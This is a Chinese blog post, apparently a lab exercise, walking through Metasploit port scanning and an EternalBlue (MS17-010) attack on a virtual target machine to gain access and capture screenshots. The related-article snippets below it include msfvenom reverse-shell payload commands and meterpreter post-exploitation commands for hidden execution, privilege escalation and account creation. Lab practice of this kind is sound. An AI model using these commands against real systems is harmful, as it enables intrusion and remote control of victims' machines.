永恒之蓝漏洞获取桌面截图

最新推荐文章于 2023-06-08 10:38:43 发布
最新推荐文章于 2023-06-08 10:38:43 发布
阅读量1.4k 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lianliandad/article/details/126759183
版权

任务

1

2

3

4

熟悉msf框架使用方法,搜索模块,aux探测开放端口等等

安装blue靶机

使用msf框架对blue靶机进行攻击,并获取权限

.利用获取的权限上传任意文件,下载远程屏幕截屏图片

  • 熟悉msf

使用方法:  help  、? 可以获取帮助 , tab 键来补齐命令 ,quit 来退出。

-v 看版本 -q 简洁启动。 返回使用 back  ,exit 进行退出。 

可以使用 nmap 192.168.19.1

搜索模块:search apache type:aux

aux探测开放端口

设置3306,22 端口 ,线程为10

msf6 auxiliary(scanner/portscan/tcp) > run

  • 安装blue 靶机 ,部署靶机到虚拟机,然后登录

192.168.19.129

  • msf框架对blue靶机进行攻击,并获取权限

永恒之蓝漏洞利用

配置IP:set rhosts 192.168.19.129

然后 run , 就完成攻击。

看 ip

看 dir

写个 888 到  /tmp/888.txt

  • 利用获取的权限上传任意文件,下载远程屏幕截屏图片

燕返故人归来
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图
沙罗沙罗的博客
05-09 4190
永恒之蓝漏洞利用(MS17-101) 文章目录永恒之蓝漏洞利用(MS17-101)一、永恒之蓝(MS17-101)介绍二、漏洞利用1.检测目标主机是否存在MS17-101漏洞2.使用msf攻击模块执行攻击总结 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(MS17-101)介绍 漏洞名称:“永恒之蓝漏洞 漏洞编号:MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148 漏洞类型:缓冲区溢出漏洞 漏洞影响:信息泄露 CVSS评分:9.3(High)
永恒之蓝 MS17-010
weixin_43726831的博客
11-19 811
WIN7系统永恒之蓝漏洞-打开摄像头、录音、视频监控、截屏 前章: 安全漏洞的分析与利用 PTES渗透测试执行标准 1.简介 永恒之蓝:是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国...
msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)
m0_61506558的博客
09-01 4675
创建之前要是系统权限(getuid查看),要不然会出现[-] Insufficient privileges, account was not be created. 看到这个提示就需要先提权(获取到system)输入 getsystem就好了。获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。meterpreter中输入:run post/windows/gather/enum_logged_on_users。...
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 3036
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
有关永恒之蓝的一些操作
x_13579的博客
02-04 780
在meterpreter 界面输入 run getgui -e 开启目标靶机的远程桌面。打开win7的cmd输入ipconfig,查看一下靶机的IP。
msf命令
qq_52469895的博客
05-19 2221
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
小试一次永恒之蓝漏洞拿到靶机桌面flag
weixin_54921807的博客
05-18 413
小试一次永恒之蓝漏洞拿到靶机桌面flag 搜索网段主机 找到靶机并且使用nmap寻找漏洞 使用msfconsole,进入msf6查找ms17模块的攻击手段 可以先选择辅助模块进行测试,我这里就先用攻击模块进行攻击了 展开所有项进行配置参数,我们能这里只需要配置靶机ip 进行攻击即可,攻击成功后进入cmd页面,改编码(因为win和linux编码不同)然后查找flag所在地址,查看flag内容 谢谢大家! ...
基础渗透测试实验—永恒之蓝漏洞复现
最新发布
G6_12的博客
06-08 4126
ms17-010,永恒之蓝漏洞复现
永恒之蓝漏洞攻击完整步骤
G_Fu_Q的博客
11-07 9161
kali攻击机 windows2003/windows2008被攻击机 ip:192.168.15.129 1.进行端口扫描 nmap -Pn -sV -T4 ip地址 明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作 2.漏洞脚本检测 nmap --script=vuln 192.168.15.129(ip地址) 看出ms17-010漏洞可以攻击 3.msfconsole测试 msfconsole 4.
kali永恒之蓝漏洞扫描(学习笔记)
qq_43236906的博客
10-15 2871
永恒之蓝漏洞扫描学习 什么是永恒之蓝 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 准备工作 准备工作:win server2008(未安装补丁)和kali linux,一台攻击,一台被攻击的或称为靶机(靶机确保被攻击的虚拟机开启445端口) 查看靶机的ip ipconfig ##在靶机上查看,本机ip为192.168.152.135 nmap
记录一次 先手工 再python脚本 验证永恒之蓝ms17-10漏洞
wh1te 小白的博客
10-19 4809
查看资料 ms17-10漏洞利用的步骤大致如下 打开msf use auxiliary/scanner/smb/smb_ms17_010 msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > set ...
kali与永恒之蓝
qq_52820087的博客
10-25 7693
kali永恒之蓝攻击写在前面一、永恒之蓝是何方神圣?二、神马是SMB协议?三、MSF四、攻击步骤1、攻击主机与靶机配置2、攻击步骤五、种植后门 写在前面   这是我的第一篇CSDN博客,最近又参加了一个CTF比赛,当然,纯属兴趣爱好,本人非网络安全专业。写这个呢是为了记录一下去年我第一次在虚拟机上成功实现了永恒之蓝攻击,同时给一个”小朋友“做参考。目前,永恒之蓝漏洞已经销声匿迹了,所以大可不必担心。 一、永恒之蓝是何方神圣?   永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影
kali linux 之复现永恒之蓝(ms17-010)漏洞
weixin_42298807的博客
08-16 5088
一、实验目的 通过永恒之蓝漏洞获取Windows系统的权限 二、实验环境 WMware 虚拟机 Windows 7 64 位 (IP:192.168.148.139) kali linux (192.168.148.128) 三、实验步骤 1、扫描网络中的主机 扫描192.168.148.0网段中存活主机的操作系统类型 发现可以攻击的主机192.168.148.139 2、扫描漏洞 开启met...
MSF命令大全
L_lemo004的博客
10-20 5862
0x00 Payload生成 Windows/Linux Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名 Web PHP: msfvenom -p php/meter
MSF基本使用
浅笑996的博客
11-10 2648
MSF 链接数据库 linux查找文件 find / -name dabase.yml 链接数据库 db_connect -y path/database.yml db_status 查询数据库链接状态 payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload) background 后台 sessions...
使用命令行进行截屏!!!
热门推荐
谈笑风声,雨下成林
12-07 1万+
今天我想进行截屏这样伟大而又稀松的任务的时候发现了,我使用不了滑动截屏,坑啊 !!! 我开始在网上怒找截屏工具,但是未果。 但是找到了,命令行截屏这么牛掰的方法,我使用了一下,还是可以的,不错啊,有可以在小伙伴面前装X了 但是在这里还是要总结一下比较好,主要介绍两种截图命令, 工作环境 : ubuntu 12:04.5 截图命令 import 和 scro
ffmpeg命令 抓屏_如何从Linux中的命令行进行屏幕截图 | MOS86
weixin_30873127的博客
02-06 1051
当谈到屏幕录像(录制桌面视频)时,大多数人会想到一个具有适当用户界面的桌面软件。对于Linux,我们涵盖了几个工具,如Kazam,Screenr和Screentoaster。许多人不知道的是,您也可以通过FFMPEG从命令行进行屏幕截图。它安装FFMPEGFFMPEG在大多数发行版中都有安装它的命令如下:Ubuntusudo apt-get install ffmpegFedorasudo yum...
msf渗透实验基本操作(上)
kiwifruit__的博客
11-23 4296
1.实验内容 (1)Metasploit主机扫描 (2)Metasploit漏洞利用 (3)Metasploit后渗透攻击 (4)Metasploit内网攻击 2.基本要求 (1)掌握Metasploit架构及使用流程; (2)掌握Metasploit主机扫描、漏洞利用; (3)掌握Metasploit后渗透攻击技术; (4)掌握Metasploit内网攻击及域渗透技术。 3.实验环境 vm虚拟机; kali2012,ip地址是192.168.70.128 win...
Kali Linux下利用永恒之蓝漏洞发起攻击获取Shell
时光途径
06-06 1万+
Material:        Computer         VMware 12        Kali Linux.ISO        InternetFirst:    Open Your Computer and VMware:Second Open Your SSH Connection Tools, Eg Securt CRT,Putty.......Input Msfconso...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值